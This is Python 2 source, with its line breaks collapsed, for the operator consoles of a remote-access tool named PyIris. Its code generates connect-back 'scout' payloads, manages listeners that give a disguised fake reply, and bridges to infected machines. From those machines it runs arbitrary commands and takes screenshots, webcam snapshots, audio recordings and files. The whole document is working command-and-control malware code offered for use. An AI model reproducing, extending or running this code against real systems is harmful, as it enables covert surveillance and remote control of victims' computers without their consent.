def cleanup(): try: try: confirmation = raw_input('\n' + cfg.user_in + 'Are you sure you want to quit [y/n] : ') except EOFError: try: time.sleep(1) except KeyboardInterrupt: clear_screen.clear() show_banner.banner() return except KeyboardInterrupt: clear_screen.clear() return if confirmation == 'y': print cfg.shutdown if cfg.db_listeners: print cfg.note + 'Killing all active listeners...' cfg.db_listeners = [] time.sleep(5) if cfg.db_scouts: try: print cfg.note + 'Disconnecting all scouts...' for i in cfg.db_scouts: try: i[5].sendall('sleep 60' + cfg.End) except: pass except IndexError: print cfg.err + 'Error disconnecting scouts' print cfg.note + 'Exiting program...' os._exit(1) else: clear_screen.clear() show_banner.banner() except EOFError: try: time.sleep(1) except KeyboardInterrupt: print '\n' + cfg.err + 'Skipping cleanup steps...' print cfg.note + 'Exiting program...' os._exit(1) except KeyboardInterrupt: print '\n' + cfg.err + 'Skipping cleanup steps...' print cfg.note + 'Exiting program...' os._exit(1)
def generator_handler_console(): set_for = '' scout_default_values = { 'Hostname': ['', 'Host address to connect back to'], 'Port': [9999, 'Host port to connect back on'], 'Key': [ cfg.listener_key, 'Listener key to be sent to listener in order to gain access' ], 'SleepTime': ['5', 'Duration for scout to sleep if it cannot connect to listener'] } while True: try: if not set_for: command_input = raw_input(cfg.prompt_generator).strip() else: command_input = raw_input( '\x1b[1m\x1b[37mPyIris (\x1b[0m' + '\x1b[1m\x1b[32mGenerator\x1b[0m \x1b[1m\x1b[37m:\x1b[0m \x1b[1m\x1b[32m' + set_for + '\x1b[0m\x1b[1m\x1b[37m) > \x1b[0m').strip() option = command_input.split(' ')[0] if option == 'banner': show_banner.banner() elif option == 'clear': clear_screen.clear() elif option == 'help': print cfg.generator_help_menu elif option == 'local': try: execute_local_command.execute( command_input.split(' ', 1)[1]) except IndexError: print cfg.err + 'Specify a local system command to execute' elif option == 'python': try: print cfg.note + 'Switching to python interpreter, exit() to exit\n' os.system('python') except KeyboardInterrupt: pass elif option == 'quit': cleanup_and_exit.cleanup() elif option == 'back': print cfg.pos + 'Returning...' return elif option == 'configs': if not set_for: print cfg.err + 'No payload has been chosen yet, run the "use" command' else: print cfg.note + 'Setting for : ' + set_for config = [[' Option', 'Value', 'Information'], [' ======', '=====', '===========']] for o, v in scout_default_values.items(): config.append([' ' + o, str(v[0]), v[1]]) print '\n' l = [len(max(i, key=len)) for i in zip(*config)] print('\n'.join(' '.join(item[i].ljust(l[i]) for i in range(len(l))) for item in config)) + '\n' elif option == 'set': try: scout_default_values[command_input.split( ' ')[1]][0] = command_input.split(' ', 2)[2] print cfg.pos + 'Set ' + command_input.split( ' ')[1] + ' to ' + command_input.split(' ', 2)[2] except (IndexError, KeyError): print cfg.err + 'Invalid syntax, specify valid option and value' elif option == 'show': for i in cfg.payload_templates_list: print i elif option == 'reset': scout_default_values = { 'Hostname': ['', 'Host address to connect back to'], 'Port': [9999, 'Host port to connect back on'], 'Key': [ cfg.listener_key, 'Listener key to be sent to listener in order to gain access' ], 'SleepTime': [ '5', 'Duration for scout to sleep if it cannot connect to listener' ] } print cfg.pos + 'Reset all values' elif option == 'use': try: payload_type = command_input.split(' ')[1] if payload_type in cfg.payload_templates_list: set_for = payload_type print cfg.pos + 'Set payload to : ' + set_for else: raise IndexError except IndexError: print cfg.err + 'Invalid payload, run "show" to see all payloads' elif option == 'generate': folder = None try: folder = command_input.split(' ', 1)[1] except IndexError: pass if not set_for: print cfg.err + 'Cannot generate, no payload set, run "use"' continue generate_payload_with_template.generate_payload( set_for, scout_default_values, folder) elif option == '': pass else: print cfg.err + 'Unknown command "' + command_input + '", run "help" for help menu' except EOFError: time.sleep(2) except Exception as e: print cfg.err + 'Error : ' + str(e)
def scout_console(): while True: try: command_input = raw_input(cfg.prompt_scouts).strip() option = command_input.split(' ', 1)[0] if option == 'banner': show_banner.banner() elif option == 'clear': clear_screen.clear() elif option == 'help': print cfg.scout_help_menu elif option == 'local': try: execute_local_command.execute( command_input.split(' ', 1)[1]) except IndexError: print cfg.err + 'Specify a local system command to execute' elif option == 'python': try: print cfg.note + 'Switching to python interpreter, exit() to exit\n' os.system('python') except KeyboardInterrupt: pass elif option == 'quit': cleanup_and_exit.cleanup() elif option == 'back': print cfg.pos + 'Returning...' return elif option == 'bridge': found_target = False try: tar_id = command_input.split(' ', 1)[1] except IndexError: print cfg.err + 'Provide a scout ID' continue for i in range(len(cfg.db_scouts)): if str(cfg.db_scouts[i][0]) == tar_id: found_target = True tar_id = i break if found_target: generic_handler.payload_handler(tar_id) else: print cfg.err + 'Invalid scout ID' elif option == 'kill': try: killed_scout = False if command_input.split(' ', 1)[1] == 'all': if cfg.db_scouts: for i in cfg.db_scouts: i[5].sendall('terminate' + cfg.End) cfg.db_scouts = [] print cfg.pos + 'Terminated all scouts' else: print cfg.err + 'No connected scouts' continue for i in cfg.db_scouts: if str(i[0]) == command_input.split(' ', 1)[1]: i[5].sendall('terminate' + cfg.End) cfg.db_scouts.pop(cfg.db_scouts.index(i)) print cfg.pos + 'Terminated scout : ' + str(i[0]) killed_scout = True break if not killed_scout: print cfg.err + 'Could not kill scout of ID : ' + command_input.split( ' ', 1)[1] except IndexError: print cfg.err + 'Invalid ID' except (socket.error, socket.timeout): print cfg.err + 'Scout seems to be dead, removing from database' for i in cfg.db_scouts: if str(i[0]) == command_input.split(' ', 1)[1]: cfg.db_scouts.pop(cfg.db_scouts.index(i)) break elif option == 'ping': try: found_target = False try: if command_input.split(' ', 1)[1] == 'all': if cfg.db_scouts: for i in range(len(cfg.db_scouts)): try: cfg.db_scouts[i][5].sendall('ping' + cfg.End) cfg.db_scouts[i][5].settimeout(6) print cfg.note + 'Scout : ' + str( cfg.db_scouts[i][0] ) + '\n' + cfg.db_scouts[i][5].recv( 99999)[:-len(cfg.End)].replace( '[+]', cfg.pos, 1) + '\n' cfg.db_scouts[i][5].settimeout(None) except (socket.timeout, socket.error): print cfg.note + 'Scout : ' + str( cfg.db_scouts[i][0] ) + '\n' + cfg.err + 'Scout is dead, no reply reveived\n' continue for i in range(len(cfg.db_scouts)): if str(cfg.db_scouts[i][0]) == command_input.split( ' ', 1)[1]: found_target = True tar_id = i break if found_target: cfg.db_scouts[tar_id][5].sendall('ping' + cfg.End) cfg.db_scouts[tar_id][5].settimeout(6) print cfg.db_scouts[tar_id][5].recv( 99999)[:-len(cfg.End)].replace( '[+]', cfg.pos, 1) cfg.db_scouts[tar_id][5].settimeout(None) else: print cfg.err + 'Invalid Scout ID' except IndexError: print cfg.err + 'Invalid Scout ID' continue except (socket.error, socket.timeout): print cfg.err + 'Scout is dead, no reply received' elif option == 'show': print '\n' + cfg.note + 'Currently active scouts :\n' if cfg.db_scouts: scout_data = [[ 'ID', 'IP address', 'Identifying Name', 'Type', 'Operating System' ], [ '==', '==========', '================', '====', '================' ]] for i in cfg.db_scouts: scout_data.append([ str(i[0]), str(i[1]), str(i[2]), str(i[3]), str(i[4]) ]) l = [len(max(i, key=len)) for i in zip(*scout_data)] print('\n'.join(' '.join(item[i].ljust(l[i]) for i in range(len(l))) for item in scout_data)) print '\n' elif option == 'sleep': try: slept_scout = False who_to_sleep = command_input.split(' ')[1] how_long_to_sleep = command_input.split(' ')[2] try: int(how_long_to_sleep) except: print cfg.err + 'Invalid sleep value' continue except IndexError: print cfg.err + 'Invalid command syntax/command arguments' continue if who_to_sleep == 'all': if cfg.db_scouts: for i in cfg.db_scouts: try: i[5].sendall('sleep ' + how_long_to_sleep + cfg.End) except (socket.error, socket.timeout): print cfg.err + 'Scout : ' + str( i[0] ) + ' appears to be dead, removing from database' cfg.db_scouts.pop(cfg.db_scouts.index(i)) cfg.db_scouts = [] print cfg.pos + 'Slept all scouts' else: print cfg.err + 'No connected scouts' else: if cfg.db_scouts: for i in cfg.db_scouts: if str(i[0]) == who_to_sleep: try: i[5].sendall('sleep ' + how_long_to_sleep + cfg.End) cfg.db_scouts.pop(cfg.db_scouts.index(i)) print cfg.pos + 'Slept scout of ID : ' + who_to_sleep slept_scout = True break except (socket.error, socket.timeout): slept_scout = True print cfg.err + 'Scout : ' + str( i[0] ) + ' appears to be dead, removing from database' cfg.db_scouts.pop(cfg.db_scouts.index(i)) if not slept_scout: print cfg.err + 'Invalid scout ID' else: print cfg.err + 'No connected scouts' elif option == '': pass else: print cfg.err + 'Unknown command "' + command_input + '", run "help" for help menu' except EOFError: time.sleep(2) except Exception as e: print cfg.err + 'Error : ' + str(e)
def main_handler_console(): try: splash_screen.display_splash_screen() clear_screen.clear() show_banner.banner() except EOFError: try: time.sleep(2) except KeyboardInterrupt: cleanup_and_exit.cleanup() except KeyboardInterrupt: cleanup_and_exit.cleanup() while True: try: cfg.blacklisted_ip = list(set(cfg.blacklisted_ip)) cfg.whitelisted_ip = list(set(cfg.whitelisted_ip)) command_input = raw_input(cfg.prompt_default).strip() option = command_input.split(' ',1)[0] if option == 'banner': show_banner.banner() elif option == 'clear': clear_screen.clear() elif option == 'help': print cfg.main_help_menu elif option == 'local': try: execute_local_command.execute(command_input.split(' ',1)[1]) except IndexError: print cfg.err + 'Specify a local system command to execute' elif option == 'python': try: print cfg.note + 'Switching to python interpreter, exit() to exit\n' os.system('python') except KeyboardInterrupt: pass elif option == 'quit': cleanup_and_exit.cleanup() elif option in ('add','rm'): set_globals.set_global_variables(command_input) elif option == 'change': change_session_values.change_values(command_input) elif option == 'fake': try: new_fake_reply = command_input.split(' ',1)[1] except IndexError: print cfg.err + 'Provide a fake reply' cfg.fake_reply = new_fake_reply print cfg.pos + 'Changed server fake reply' elif option == 'listeners': print cfg.pos + 'Switching...' listener_handler.listener_handler_console() elif option == 'scouts': print cfg.pos + 'Switching...' scout_handler.scout_console() elif option == 'generator': print cfg.pos + 'Switching...' generator_handler.generator_handler_console() elif option == 'show': print '\n' + cfg.note + 'Whitelisted IPs : ' + ', '.join(cfg.whitelisted_ip) print '\n' + cfg.note + 'Blacklisted IPs : ' + ', '.join(cfg.blacklisted_ip) print '\n' + cfg.note + 'Current default listener key : ' + cfg.listener_key print '\n' + cfg.note + 'Current default scout key : ' + cfg.scout_key print '\n' + cfg.note + 'Current listener fake reply : ' + cfg.fake_reply + '\n' elif option == 'reset': try: option = command_input.split(' ')[1] if option == 'wlist': cfg.whitelisted_ip = [] print cfg.pos + 'reset value' elif option == 'blist': cfg.blacklisted_ip = [] print cfg.pos + 'reset value' elif option == 'key': cfg.listener_key = cfg.untouched_server_key print cfg.pos + 'reset value' elif option == 'sid': cfg.scout_key = cfg.untouched_scout_identifier print cfg.pos + 'reset value' elif option == 'fake_reply': cfg.fake_reply = 'Socket Server Running' print cfg.pos + 'reset value' elif option == 'all': cfg.whitelisted_ip,cfg.blacklisted_ip = [],[] cfg.listener_key,cfg.scout_key = cfg.untouched_server_key,cfg.untouched_scout_identifier cfg.fake_reply = 'Socket Server Running' print cfg.pos + 'reset all' else: raise IndexError except IndexError: print cfg.err + 'Invalid command syntax/command arguments' elif option == '': pass else: print cfg.err + 'Unknown command "' + command_input + '", run "help" for help menu' except EOFError: try: time.sleep(2) except KeyboardInterrupt: cleanup_and_exit.cleanup() except KeyboardInterrupt: cleanup_and_exit.cleanup()
def payload_handler(id): print cfg.pos + 'Bridged to scout of ID : ' + str(cfg.db_scouts[id][0]) prompt_handler = '\x1b[1m\x1b[37mPyIris (\x1b[0m\x1b[1m\x1b[31m' + cfg.db_scouts[id][3] + '\x1b[0m\x1b[1m\x1b[37m@\x1b[0m\x1b[1m\x1b[31m' + cfg.db_scouts[id][1] + '\x1b[0m\x1b[1m\x1b[37m) > \x1b[0m' sock = cfg.db_scouts[id][5] while True: try: command_input = raw_input(prompt_handler).strip() option = command_input.split(' ',1)[0] if option == 'banner': show_banner.banner() elif option == 'clear': clear_screen.clear() elif option == 'local': try: execute_local_command.execute(command_input.split(' ',1)[1]) except IndexError: print cfg.err + 'Specify a local system command to execute' elif option == 'python': try: print cfg.note + 'Switching to python interpreter, exit() to exit\n' os.system('python') except KeyboardInterrupt: pass elif option == 'quit': cleanup_and_exit.cleanup() elif option == 'back': print cfg.pos + 'Returning...' return elif option == 'disconnect': sock.sendall(command_input + cfg.End) output = recv_all.recvall(sock) print output cfg.db_scouts.pop(id) break elif option == 'terminate': sock.sendall(command_input + cfg.End) output = recv_all.recvall(sock) print output cfg.db_scouts.pop(id) break elif option == 'sleep': sock.sendall(command_input + cfg.End) output = recv_all.recvall(sock) print output if '[*]' in output: cfg.db_scouts.pop(id) break elif option == 'download': sock.sendall(command_input + cfg.End) output = recv_all.recvall(sock) if '|/' in output: output = output.rstrip(cfg.End).split('|/', 1) f = open(find_basename.basename(output[0]), 'wb') f.write(output[1]) f.close() print cfg.pos + 'Downloaded file succesfully' else: print output elif option in ('upload','transport_kill','transport'): try: file_name = command_input.split(' ', 1)[1] except: print cfg.err + 'Specify file to upload' continue if os.path.isfile(file_name): f = open(file_name, 'rb') data = f.close() sock.sendall(command_input.split(' ',1)[0]+' '+file_name + '|/' + data + cfg.End) output = recv_all.recvall(sock) print output else: print cfg.err + 'File path/name is not valid' elif option == 'valids': sock.sendall(command_input + cfg.End) output = recv_all.recvall(sock) if '|/' in output: load_output = output.split('|/') for i in load_output: print cfg.note + i elif option == 'active': sock.sendall(command_input + cfg.End) output = recv_all.recvall(sock) if '|/' in output: output = output.split('|/') for i in output: if not i: continue print cfg.pos + i else: print output elif option == 'drives': sock.sendall(command_input + cfg.End) output = recv_all.recvall(sock) if '|/' in output: output = output.split('|/') for i in output: print cfg.pos + i else: print output elif option == 'screen': sock.sendall(command_input + cfg.End) output = recv_all.recvall(sock) if '|/' in output: output = output.split('|/', 1) f = open(find_basename.basename(output[0]), 'wb') f.write(output[1]) f.close() print cfg.pos + 'Downloaded scouts screenshot as : ' + find_basename.basename(output[0]) else: print output elif option == 'webcam': sock.sendall(command_input + cfg.End) output = recv_all.recvall(sock) if '|/' in output: output = output.split('|/', 1) f = open(find_basename.basename(output[0]), 'wb') f.write(output[1]) f.close() print cfg.pos + 'Downloaded scouts webcam snapshot as : ' + find_basename.basename(output[0]) else: print output elif option == 'rec_audio': sock.sendall(command_input + cfg.End) print cfg.pos + 'Recording, please be patient ' output = recv_all.recvall(sock) if '|/' in output: output = output.split('|/', 1) f = open(find_basename.basename(output[0]), 'wb') f.write(output[1]) f.close() print cfg.pos + 'Downloaded scouts audio recording as : ' + find_basename.basename(output[0]) else: print output elif option == '': pass else: sock.sendall(command_input + cfg.End) output = recv_all.recvall(sock) print output except socket.error as e: print cfg.err + 'Socket error detected : ' + str(e) print cfg.err + 'Stopping current session...' cfg.db_scouts.pop(id) print cfg.note + 'Returning...' return except EOFError: time.sleep(2) except Exception as e: print cfg.err + 'Error : ' + str(e)